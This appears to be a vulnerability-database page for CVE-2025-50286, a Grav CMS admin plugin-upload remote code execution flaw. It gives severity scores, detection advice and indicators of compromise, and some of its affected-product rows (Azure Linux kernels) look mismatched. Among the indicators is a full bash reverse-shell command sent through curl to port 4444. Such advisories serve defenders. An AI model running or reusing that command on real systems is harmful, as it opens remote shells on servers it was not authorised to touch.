cbcvebase.
CVE-2025-50286
published 2025-08-06

CVE-2025-50286: A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install…

PriorityP269high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
8.71%
94.5th percentile
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.

Affected

3 ranges
VendorProductVersion rangeFixed in
getgravgrav
msrcazl3_kernel_6.6.57.1-7_on_azure_linux_3.0
msrccbl2_kernel_5.15.180.1-1_on_cbl_mariner_2.0

Detection & IOCsextracted from sources · hover to see the quote

url/admin/tools/direct-install
pathmulti/http/grav_admin_direct_install_rce_cve_2025_50286
filenameevilplugin.php
filenameblueprints.yaml
commandcurl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http:///
  • Monitor HTTP POST requests to /admin/tools/direct-install containing ZIP file uploads; malicious archives follow the structure of a plugin directory with a PHP file and blueprints.yaml.
  • Alert on web server processes (e.g., www-data/apache2) spawning outbound TCP connections or bash reverse shells, particularly to non-standard ports such as 4444.
  • Detect newly created PHP files under the Grav plugins directory following a ZIP upload to the Direct Install endpoint, as the uploaded plugin is written to disk and executed by the application.
  • ·Exploitation requires valid admin-level credentials; this is an authenticated RCE, not unauthenticated. Detection should focus on admin-authenticated sessions performing plugin uploads.
  • ·The Metasploit module targets Grav CMS versions 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x; scope detection rules accordingly and do not apply to versions outside this range.
  • ·The NVD entry and exploit-db reference Grav CMS v1.7.48, while the Metasploit module extends coverage to <=1.7.49.5 / Admin Plugin <=1.10.49.3; ensure patching covers the full affected range.

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_msrc7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.